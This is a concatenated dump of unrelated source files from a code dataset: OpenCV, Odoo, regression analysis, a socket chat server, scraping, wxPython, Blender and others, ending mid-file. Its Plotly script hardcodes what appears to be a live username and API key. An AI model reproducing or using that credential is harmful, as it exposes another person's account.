detector.detect(gray, None)\n\nimg2 = cv2.drawKeypoints(img, kps, None, color=(255,0,0))\n\ncv2.imshow(\"image\", np.hstack([img, img2]))\ncv2.waitKey(0)\n","sub_path":"aulas/vision/aula_11/fast_detecter_pontos.py","file_name":"fast_detecter_pontos.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419078265","text":"# -*- coding: utf-8 -*-pack\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, models, fields\nfrom odoo.addons.iap.tools import iap_tools\nfrom ..endpoint import DEFAULT_ENDPOINT\n\n\nclass ResPartner(models.Model):\n \"\"\"\n Inherited for VAT configuration in partner of Warehouse.\n \"\"\"\n _inherit = \"res.partner\"\n\n is_amz_customer = fields.Boolean(\"Is Amazon Customer?\")\n\n @api.model\n def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):\n if not self.env.context.get('is_amazon_partner', False):\n args = [('is_amz_customer', '=', False)] + list(args)\n return super(ResPartner, self)._search(args, offset, limit, order, count, access_rights_uid)\n\n @api.onchange(\"country_id\")\n def _onchange_country_id(self):\n \"\"\"\n Inherited for updating the VAT number of the partner as per the VAT configuration.\n @author: Maulik Barad on Date 13-Jan-2020.\n \"\"\"\n if self.country_id:\n warehouse_ids = self.env[\"stock.warehouse\"].search_read(\\\n [(\"partner_id\", \"=\", self._origin.id)],\n [\"id\", \"company_id\"])\n if warehouse_ids:\n vat_config = self.env[\"vat.config.ept\"].search(\\\n [(\"company_id\", \"=\", warehouse_ids[0].get(\"company_id\")[0])])\n vat_config_line = vat_config.vat_config_line_ids.filtered(\\\n lambda x: x.country_id == self.country_id)\n if vat_config_line:\n self.write({\"vat\": vat_config_line.vat})\n return super(ResPartner, self)._onchange_country_id()\n\n @api.model\n def create(self, vals):\n if vals.get('is_amz_customer'):\n vals.update({'allow_search_fiscal_based_on_origin_warehouse': True})\n return super(ResPartner, self).create(vals)\n\n def auto_delete_customer_pii_details(self):\n \"\"\"\n Auto Archive Customer's PII Details after 30 days of Import as per Amazon MWS Policies.\n :return:\n \"\"\"\n if not self.env['amazon.seller.ept'].search([]):\n return True\n account = self.env['iap.account'].search([('service_name', '=', 'amazon_ept')])\n dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')\n kwargs = {\n 'app_name': 'amazon_ept',\n 'account_token': account.account_token,\n 'dbuuid': dbuuid,\n 'updated_records': 'Scheduler for delete PII data has been started.'\n }\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n query = \"\"\"update res_partner set name='Amazon',commercial_company_name='Amazon', \n display_name='Amazon', \n street=NULL,street2=NULL,email=NULL,city=NULL,state_id=NULL,country_id=NULL,\n zip=Null,phone=NULL,mobile=NULL\n from\n (select r1.id as partner_id,r2.id as partner_invoice_id,r3.id as \n partner_shipping_id from sale_order\n inner join res_partner r1 on r1.id=sale_order.partner_id\n inner join res_partner r2 on r2.id=sale_order.partner_invoice_id\n inner join res_partner r3 on r3.id=sale_order.partner_shipping_id\n where amz_instance_id is not null and sale_order.create_date<=current_date-30)T\n where res_partner.id in \n (T.partner_id,T.partner_invoice_id,T.partner_shipping_id)\n \"\"\"\n self.env.cr.execute(query)\n\n if self.env.cr.rowcount:\n kwargs.update({'updated_records': 'Archived %d customers' % self.env.cr.rowcount})\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n return True\n","sub_path":"amazon_ept/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402098672","text":"import os\nimport collections\nimport json\n\n\ndef update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n d[k] = update(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\n\ndef update_from_path(d, u, path):\n if len(path) == 1:\n d[path[0]] = u[path[0]]\n return d\n d[path[0]] = update_from_path(d.get(path[0], {}), u[path[0]], path[1:])\n return d\n\n\ndef update_config_from_state(c, logger):\n if 'state' not in c or 'file' not in c['state']:\n raise ValueError('No state listed in config')\n if os.path.exists(c[\"state\"][\"file\"]):\n with open(c[\"state\"][\"file\"], \"r\") as f:\n state = json.load(f)\n c = update(c, state)\n else:\n logger.info(\"State storage file doesn't exist, initializing with empty state!\")\n return c\n\n\ndef update_state(config, logger):\n if 'state' not in config or 'file' not in config['state']:\n raise ValueError('No state listed in config')\n if len(config[\"state\"][\"file\"]) < 1:\n logger.info(\"State storage disabled in config (state file empty)! Skipping update..\")\n return\n state = {}\n for field_path in config[\"state\"][\"fields\"]:\n field_path_list = field_path.split(\":\")\n update_from_path(state, config, field_path_list)\n try:\n with open(config[\"state\"][\"file\"], \"w\") as f:\n json.dump(state, f, indent=2)\n except Exception as e:\n logger.warning(\"Failed to save state file, because: {}\".format(str(e)))\n","sub_path":"utils/src/python/ConfigUtils.py","file_name":"ConfigUtils.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"273374653","text":"#! /usr/bin/python2\n\nfrom jinja2 import Template, Environment, FileSystemLoader\nfrom os import listdir\n\nmanglers = {\n '.hs': \"Hs\",\n '.py': \"Py\",\n '.ou': \"Out\",\n}\n\ndef mangle(xs):\n def _mangle(xs, ms):\n if not ms:\n return xs\n m = ms.pop()\n return _mangle(xs.replace(*m), ms)\n return _mangle(xs, manglers.items())\n\nbpath = \"./examples/\"\nxs = listdir(bpath)\nxs = [x for x in xs if x[-3:] in manglers.keys()]\nxs = [(mangle(x), open(bpath + x).read().strip()) for x in xs]\n\nopen(\"./index.html\", \"w\").write(\n Environment(loader = FileSystemLoader('./')).\\\n get_template(\"./index.html.jinja\").\\\n render(**dict(xs)).\\\n encode(\"utf-8\")\n)\n","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117180179","text":"\"\"\"Variable selection using ridge regression\"\"\"\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\n\nfrom bld.project_paths import project_paths_join as ppj\nfrom src.model_code.polynomialregression import PolynomialRegression\nfrom src.model_code.ridgeregression import RidgeRegression\nfrom src.utilities.utilities import load_testing_data\nfrom src.utilities.utilities import load_training_data\n\n\ndef is_interaction(coef_name):\n return \":\" in coef_name\n\n\ndef is_squared(coef_name):\n return coef_name.endswith(\"^2\")\n\n\nif __name__ == \"__main__\":\n # data used for ridge regression (low sample size to induce regularization)\n Xridge, yridge = load_training_data(nobs=200)\n # data used for polynomial model fitting on subset of variables\n Xpol, ypol = load_training_data(nobs=5000)\n # data used to estimate the mean absolute error on test set\n Xtest, ytest = load_testing_data(nobs=5000)\n\n rr = RidgeRegression()\n pr = PolynomialRegression()\n\n # ridge regression, variable regularization\n rr = rr.fit(Xridge, yridge, degree=1)\n\n coef = rr.coefficients.values.reshape(-1)\n\n thresholds = np.linspace(0, 0.05, num=500)\n\n # find parameters which are zero given a threshold\n is_zero = []\n for thresh in thresholds:\n zero = np.where(np.abs(coef) < thresh)[0]\n is_zero.append(zero)\n\n # extract parameter names\n is_zero_named = [rr.coefficients.index[index].to_list() for index in is_zero]\n\n is_zero_squared = [[e for e in x if is_squared(e)] for x in is_zero_named]\n is_zero_interaction = [[e for e in x if is_interaction(e)] for x in is_zero_named]\n is_zero_linear = [\n [e for e in x if not is_interaction(e) and not is_squared(e)]\n for x in is_zero_named\n ]\n\n # compute test mae using polynomial model and store in data frame\n mae = []\n for drop in is_zero_named:\n XX = Xpol.drop(drop, axis=1)\n XXtest = Xtest.drop(drop, axis=1)\n pr = pr.fit(XX, ypol, degree=2, fit_intercept=True)\n ypred = pr.predict(XXtest)\n mae.append(mean_absolute_error(ytest, ypred))\n\n df = pd.DataFrame(zip(mae, thresholds), columns=[\"mae\", \"thresholds\"])\n\n # compute when the set of variables that are set to zero changes\n changes = []\n change_index = []\n for i in range(len(is_zero_linear) - 1):\n e = set(is_zero_linear[i])\n ee = set(is_zero_linear[i + 1])\n if e != ee:\n change_index.append(i + 1)\n changes.append(list(ee - e)[0])\n\n # save data\n data = {\n \"df\": df,\n \"change_index\": change_index,\n \"changes\": changes,\n \"thresholds\": thresholds,\n }\n with open(ppj(\"OUT_ANALYSIS\", \"variable_selection.pkl\"), \"wb\") as handle:\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","sub_path":"src/analysis/variable_selection.py","file_name":"variable_selection.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"230195922","text":"import numpy as np\nimport random\nimport os\n\ncls=\"\\n\"*100\nprint(\"------------- Soma de Matrizes -------------\")\nwhile True:\n\tprint(\"Matriz A\")\n\tmA = int(input(\"Numero de linhas: \"))\n\tnA = int(input(\"Numero de colunas: \"))\n\tx=mA*nA\n\tmatA = np.arange(x).reshape(mA,nA)\n\n\tprint()\n\t\n\tprint(\"Matriz B\")\n\tmB = int(input(\"Numero de linhas: \"))\n\tnB = int(input(\"Numero de colunas: \"))\n\tx=mB*nB\n\tmatB = np.arange(x).reshape(mB,nB)\n\n\tif (mA!=mB) or (nA!=nB):\n\t\tos.system('cls' if os.name == 'nt' else 'clear')\n\t\tprint(\"Impossivel realizar a soma, numero de linhas ou de colunas diferentes entre as matrizes A e B\")\n\telse:\n\t\tbreak\n\nmatC = np.arange(x).reshape(mB,nB)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatA[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatB[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatC[i][j] = matA[i][j] + matB[i][j]\nprint()\n\nespaco = ' '*nA\n\nprint(\"Matriz A\",espaco, end='\t\t')\nprint(\"Matriz B\",espaco, end='\t\t')\nprint(\"Matriz C\")\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tprint(matA[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matB[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matC[i][j], end=\" \")\n\tprint()\n","sub_path":"1e.py","file_name":"1e.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52571614","text":"# protest.py\n# by aaron montoya-moraga\n# march 2017\n\n# to distribute, on terminal do\n# python setup.py sdist\n\n# from distutils.core import setup\n\nfrom setuptools import *\nfrom codecs import open\nfrom os import path\n\n\n# taken from https://tom-christie.github.io/articles/pypi/\nhere = path.abspath(path.dirname(__file__))\n\n# taken from https://tom-christie.github.io/articles/pypi/\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='protest',\n version='0.5.11',\n url='https://github.com/montoyamoraga/protestpy',\n author='aaron montoya-moraga',\n description='automatic generation of protesting material',\n long_description=long_description,\n license='MIT',\n packages= find_packages(exclude=['contrib', 'docs', 'tests*']),\n install_requires=['Pillow', 'videogrep', 'selenium<3.0.0', 'youtube_dl', 'chromedriver'],\n package_data={'protest': ['*.ttf']}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"579312729","text":"import Globals\r\nimport wx\r\nimport PlatformMethods\r\n\r\nclass DirectoryTreeView:\r\n def __init__(self, parentWin, treeDirList):\r\n self.parentWindow = parentWin\r\n self.treeDirList = treeDirList\r\n # Create an image list\r\n dirIL = wx.ImageList(16,16, True)\r\n \r\n # Get some standard images from the art provider and add them\r\n # to the image list\r\n self.fldridx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FOLDER, \r\n wx.ART_OTHER, (16,16)))\r\n \r\n self.fldropenidx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, \r\n wx.ART_OTHER, (16,16)))\r\n #Give the tree the image list\r\n self.treeDirList.AssignImageList(dirIL)\r\n #self.SetTreeButtons()\r\n self.UpdateDirectoryList()\r\n \r\n \r\n def UpdateDirectoryList(self):\r\n if len(Globals.DirectoryList) == 0:\r\n dirSet = set()\r\n for file in Globals.FileInfoList:\r\n dirSet.add(file.DirectoryPath)\r\n Globals.DirectoryList = list(dirSet)\r\n \r\n \r\n def SetTreeButtons(self):\r\n\r\n bitmap_plus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/plus4.ico\")\r\n bitmap_minus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/minus4.ico\")\r\n \r\n bitmap = wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO)\r\n width = bitmap.GetWidth()\r\n \r\n il = wx.ImageList(width, width)\r\n \r\n il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n\r\n self.buttonsIL = il \r\n #self.treeDirList.SetButtonsImageList(il)\r\n self.treeDirList.AssignButtonsImageList(il)\r\n \r\n def GetParentItem(self, parentName):\r\n parentItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while parentItem:\r\n if self.GetItemText(parentItem) == parentName:\r\n return parentItem\r\n parentItem = self.treeDirList.GetNextSibling(parentItem)\r\n return parentItem\r\n \r\n \r\n def AddDirectoryTreeNode(self, dirPath):\r\n dirList = dirPath.split(PlatformMethods.GetDirSeparator())\r\n #print dirList\r\n parentItem = self.root\r\n childrenDirList = dirList[1:]\r\n for dirName in dirList:\r\n if not dirName:\r\n continue\r\n #always start from directories in the drive e.g. C:\\NMT\\Research\\AJAX\r\n #dirName = dirList[i]\r\n siblingItem = self.GetSiblingItem(parentItem, dirName)\r\n #no directory with that name found in this level, so add it\r\n if not siblingItem:\r\n if parentItem == self.root:\r\n #add drive and image\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n else:\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n self.AddSubDirectories(siblingItem, childrenDirList)\r\n break\r\n else:\r\n childrenDirList = childrenDirList[1:]\r\n parentItem = siblingItem\r\n \r\n self.treeDirList.SortChildren(parentItem)\r\n \r\n \r\n #dir List without drive\r\n def AddSubDirectories(self, parentItem, childrenDirList):\r\n for dirName in childrenDirList:\r\n #Insert new node as parent Item\r\n parentItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(parentItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(parentItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n \r\n \r\n def GetSiblingItem(self, parentItem, dirName):\r\n siblingItem = self.treeDirList.GetFirstChild(parentItem)[0]\r\n while siblingItem:\r\n if self.GetTreeItemText(siblingItem) == dirName:\r\n break\r\n siblingItem = self.treeDirList.GetNextSibling(siblingItem)\r\n return siblingItem\r\n\r\n\r\n def GetDriveItem(self, driveName):\r\n rootDirItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while rootDirItem:\r\n if self.GetItemText(rootDirItem) == driveName:\r\n break\r\n parentItem = self.treeDirList.GetNextSibling(rootDirItem)\r\n return rootDirItem\r\n \r\n \r\n def AddDirectoryTreeNodes(self):\r\n self.treeDirList.DeleteAllItems()\r\n #tbd: add image for the root\r\n self.root = self.treeDirList.AddRoot(\"Folders (\" + str(Globals.CurrentProject.TotalDirectories) + \")\")\r\n fullDirPath = Globals.DirectoryList[0]\r\n fullPathList = fullDirPath.split(PlatformMethods.GetDirSeparator())\r\n \r\n for dirPath in Globals.DirectoryList:\r\n self.AddDirectoryTreeNode(dirPath)\r\n \r\n self.treeDirList.SortChildren(self.root)\r\n self.treeDirList.Expand(self.root)\r\n return self.root\r\n \r\n \r\n def GetTreeItemText(self, item):\r\n if item:\r\n return self.treeDirList.GetItemText(item)\r\n else:\r\n return \"\"","sub_path":"DirectoryViewStyle.py","file_name":"DirectoryViewStyle.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"116681642","text":"#coding=utf-8\nfrom oscar.apps.catalogue.admin import * # noqa\nfrom .models import SearchFilter,ProductAttribute,ProductGroup\n\nadmin.site.unregister(ProductAttribute,)\n\nclass SearchFilterUserMoneyChangeAdmin(admin.ModelAdmin):\n list_display = ('class_id','attribute', 'search_value', 'search_order', 'chose')\n \n \n def class_id(self,obj):\n return obj.attribute.product_class.name\n class_id.short_description= u'商品类'\n \n #过滤搜索属性\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n if db_field.name == 'attribute':\n kwargs['queryset'] = ProductAttribute.objects.filter(search_filter=True)\n\n return super(SearchFilterUserMoneyChangeAdmin,self).formfield_for_foreignkey(db_field, request=request, **kwargs)\n\nclass SearchFilterInline(admin.TabularInline):\n model = SearchFilter\n \nclass ProductAttributeAdmin(ProductAttributeAdmin):\n list_display = ('name', 'code', 'product_class', 'type')\n prepopulated_fields = {\"code\": (\"name\", )}\n inlines=[SearchFilterInline,]\n \nclass ProductGroupAdmin(admin.ModelAdmin):\n list_display = ('name',)\n filter_horizontal = ('attr',)\n \n\nadmin.site.register(SearchFilter,SearchFilterUserMoneyChangeAdmin)\nadmin.site.register(ProductAttribute, ProductAttributeAdmin)\nadmin.site.register(ProductGroup, ProductGroupAdmin)\n","sub_path":"stars/apps/catalogue/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"331016124","text":"\"\"\"Utilities for using the OpenCL kernels.\"\"\"\nimport numpy as np\nimport pyopencl as cl\n\n\nDOUBLE_FP_SUPPORT = (\n cl.device_fp_config.DENORM | cl.device_fp_config.FMA |\n cl.device_fp_config.INF_NAN | cl.device_fp_config.ROUND_TO_INF |\n cl.device_fp_config.ROUND_TO_NEAREST |\n cl.device_fp_config.ROUND_TO_ZERO\n )\n\n\ndef double_fp_support(device):\n \"\"\"\n Test whether a context supports double floating-point precission.\n\n :arg device: The OpenCL context to test.\n :type device: :class:`pyopencl._cl.Device`\n\n :returns: `True` if the device supports double floating-point precision,\n `False` otherwise.\n :rtype: `bool`\n \"\"\"\n return device.get_info(cl.device_info.DOUBLE_FP_CONFIG) & DOUBLE_FP_SUPPORT\n\n\ndef get_context():\n \"\"\"\n Find an appropriate OpenCL context.\n\n This function looks for a device with support for double\n floating-point precision and prefers GPU devices.\n\n :returns: A context with a single suitable device, or `None` is no suitable\n device is found.\n :rtype: :class:`pyopencl._cl.Context` or `NoneType`\n \"\"\"\n for platform in cl.get_platforms():\n for device_type in [cl.device_type.GPU, cl.device_type.ALL]:\n for device in platform.get_devices(device_type):\n if double_fp_support(device):\n return cl.Context([device])\n return None\n\n\ndef pad(array, group_size, axis=0):\n \"\"\"\n Pad an array with zeros so that it is a multiple of the group size.\n\n :arg array: Array to pad.\n :type array: :class:`numpy.ndarray`\n :arg int group_size: OpenCL group size.\n :arg int axis: The axis to pad with zeros. Default is 0.\n\n :returns: `array` padded with an appropriate number of zeros.\n :rtype: :class:`numpy.ndarray`\n \"\"\"\n array_size = array.shape[axis]\n remainder = array_size % group_size\n if remainder == 0:\n return array\n else:\n padding = group_size - array_size % group_size\n padding_shape = list(array.shape)\n padding_shape[axis] = padding\n return np.concatenate(\n (array, np.zeros(padding_shape, dtype=array.dtype)), axis=axis\n )\n","sub_path":"peridynamics/cl/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506784711","text":"# server.py\n \nimport sys\nimport socket\nimport select\nimport re\nfrom utils import *\n\nclass Server:\n \n socket_list = []\n channels = []\n client_channel_map = {}\n host = \"localhost\"\n \n def __init__(self, port):\n self.host = socket.gethostbyname(self.host)\n self.port = int(port)\n \n # initialize the server socket with given host and port\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind((self.host, self.port))\n \n # make it listen to 5 connections\n self.server_socket.listen(5)\n \n # add server socket to the list of readable connections\n self.socket_list.append(self.server_socket)\n \n def start_chat(self):\n while True:\n # get the list of sockets ready to be read through select.select\n ready_to_read, ready_to_write, in_error = select.select(self.socket_list, [], [])\n \n for socket in ready_to_read:\n if socket == self.server_socket:\n self.connection_request()\n \n # message is from an existing client connection\n else:\n try:\n message = socket.recv(MESSAGE_LENGTH)\n client_address = str(socket.getpeername())\n client_name = message.split(\" \", 1)[0].replace(\"[\", \"\").replace(\"]\", \"\")\n\n if message:\n # message is a control message\n if re.match(r'/', message.split(\" \", 1)[1].rstrip()):\n self.control_message(message, client_name, client_address, socket)\n \n # if not an ordinary message\n else:\n if self.client_channel_map.get(client_address):\n if \"Disconnect!\" in message.rstrip():\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(client_name) + \"\\n \")\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n else:\n self.broadcast(socket, message + \" \")\n else:\n self.send_to_client(socket, SERVER_CLIENT_NOT_IN_CHANNEL + \"\\n \")\n except:\n continue\n \n \n # if a new connection request is received\n # socket == self.server_socket works because client socket is binded or has \n # the same host and ip such as this client\n def connection_request(self):\n (new_client_socket, (address)) = self.server_socket.accept()\n self.socket_list.append(new_client_socket)\n self.send_to_client(new_client_socket, \"Welcome to the chat app! Your address is \" + str(address) + \".\\n \")\n \n # handles control messages \n def control_message(self, message, name, address, socket):\n # send channel list to client\n if re.match(r'/list$', message.split(\" \", 1)[1].rstrip()):\n for channel in self.channels:\n self.send_to_client(socket, channel + \"\\n \")\n # client wants to create a new channel\n # elif \"/create\" in message:\n elif re.match(r'^(/create)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/create\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/create \")[1].rstrip()\n if channel in self.channels:\n self.send_to_client(socket, SERVER_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \"\\n \")\n \n self.channels.append(channel)\n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You created a new channel named \" + channel + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_CREATE_REQUIRES_ARGUMENT + \".\\n \")\n # join an existing channel \n # elif \"/join\" in message:\n elif re.match(r'^(/join)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/join\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/join \")[1].rstrip()\n if channel in self.channels:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \".\\n \")\n \n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You joined a channel named \" + channel + \".\\n \")\n self.broadcast(socket, SERVER_CLIENT_JOINED_CHANNEL.format(name) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_NO_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_JOIN_REQUIRES_ARGUMENT + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_INVALID_CONTROL_MESSAGE.format(message.split(\" \", 1)[1].rstrip()) + \"\\n \")\n \n # send message to all clients \n def broadcast(self, client_socket, message):\n for socket in self.socket_list:\n # send messages only to peers\n if socket != self.server_socket and socket != client_socket:\n if self.client_channel_map[str(client_socket.getpeername())] == self.client_channel_map[str(socket.getpeername())]:\n try:\n socket.send(message)\n except:\n socket.close()\n if socket in self.socket_list:\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n \n # send to a specific client\n def send_to_client(self, client_socket, message):\n try:\n client_socket.send(message)\n except:\n client_socket.close()\n if client_socket in self.socket_list:\n self.socket_list.remove(client_socket)\n self.client_channel_map.pop(client_socket)\n\nif len(sys.argv) < 3:\n server = Server(sys.argv[1])\n server.start_chat()","sub_path":"Machine Problem #1 Chat (Kuizon, Vicente)/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499966737","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass MinecraftWikiCrawler:\n\n def __init__(self):\n self.Prefix = 'https://minecraft-zh.gamepedia.com/'\n\n def Search(self, Tag):\n format_string = ''\n url = self.Prefix + Tag\n res = requests.get(url)\n content = res.content\n soup = BeautifulSoup(content, 'html.parser')\n Total = ''\n for index, data in enumerate(soup.select('#pageWrapper #bodyContent div.mw-parser-output p')):\n format_string += str(data.text)\n if data.has_attr('href'):\n format_string += str(data['href'])\n Total += format_string\n return Total\n","sub_path":"Models/MinecraftWikiCrawler.py","file_name":"MinecraftWikiCrawler.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9057445","text":"#Name: Chris Demundo\n#Umich ID: cdemundo\n\n# Imports -- you may add others but do not need to\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport csv\n\n#login to plot.ly required to save offline image files\npy.sign_in('cdemundo', 'UEVvPcPrIgVPn6YTRLBF')\n\n# Code here should involve creation of the bar chart as specified in instructions\n# And opening / using the CSV file you created earlier with noun data from tweets\ncsv_file_path = \"./noun_data.csv\"\n\nwith open(csv_file_path) as f:\n reader = csv.DictReader(f)\n data = [r for r in reader]\n\ndata = [go.Bar(\n x=[d[\"Noun\"] for d in data],\n y=[d[\"Number\"] for d in data]\n )]\n\nlayout = go.Layout(\n title='Analysis of Tweets',\n xaxis=dict(\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n ),\n yaxis=dict(\n title='Number of Times Used',\n titlefont=dict(\n size=16,\n color='rgb(107, 107, 107)'\n ),\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n )\n)\n\nfig = go.Figure(data=data, layout=layout)\n\npy.image.save_as(fig, filename='part4_viz_image.png')","sub_path":"part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241890502","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n#bl_info = {\n# \"name\": \"Balance Vertex Groups\",\n# \"author\": \"Koilz\",\n# \"version\": (1, 1),\n# \"blender\": (2, 70, 0),\n# \"location\": \"Properties > Data > Vertex Groups > Edit Mode\",\n# \"description\": \"Balance the weight of two vertex groups\",\n# \"warning\": \"\",\n# \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Rigging/VG_Oppose\",\n# \"category\": \"Rigging\"}\n\nimport bpy\n\nbpy.types.Scene.vgai2 = bpy.props.StringProperty(name=\"Vertex Group Index 2\", description=\"Second active index for vertex groups\", default='')\n\ndef main(context):\n\n # save vertex_group\n vg_previous = context.active_object.vertex_groups.active_index\n\n # save weight\n vg_weight_previous = context.scene.tool_settings.vertex_group_weight\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # oppose vertex group\n context.active_object.vertex_groups.active_index = context.active_object.vertex_groups[context.scene.vgai2].index\n\n # oppose weight\n context.scene.tool_settings.vertex_group_weight = 1-vg_weight_previous\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # restore vertex group\n context.active_object.vertex_groups.active_index = vg_previous\n\n # restore weight\n context.scene.tool_settings.vertex_group_weight = vg_weight_previous\n\nclass OT_BALANCE_VG(bpy.types.Operator):\n \"\"\"Balance the weight of two vertex groups\"\"\"\n bl_idname = \"object.vertex_group_balance\"\n bl_label = \"Balance\"\n\n @classmethod\n def poll(cls, context):\n return context.active_object is not None\n\n def execute(self, context):\n main(context)\n return {'FINISHED'}\n\ndef add_vertex_group_tools(self, context):\n\n layout = self.layout\n\n ob = context.object\n\n if ob.vertex_groups and 